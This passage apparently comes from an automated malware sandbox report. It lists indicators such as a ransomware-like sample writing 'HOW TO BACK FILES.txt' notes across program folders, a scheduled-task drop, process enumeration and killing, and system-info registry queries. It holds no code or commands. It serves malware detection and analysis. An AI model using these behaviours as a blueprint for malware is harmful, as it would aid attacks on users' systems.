| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-black_scale-125.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\MediumTile.scale-200_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.password.template | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007 | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-100_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office15\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-100_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-400_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\classlist | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_ReptileEye.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\2.jpg | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_2019.729.2301.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\1.jpg | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.config | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireMedTile.scale-200.jpg | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\Desktop\a\random.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Creates scheduled task(s)
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133617333282974790" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000009c6e09240a1da01a96b3ab041b4da01a96b3ab041b4da0114000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 = 4400310000000000c158798410006100340009000400efbec1587884c15879842e000000e8330200000009000000000000000000000000000000b5d4b0006100000010000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\NodeSlot = "12" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "11" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1226833921" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Documents" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
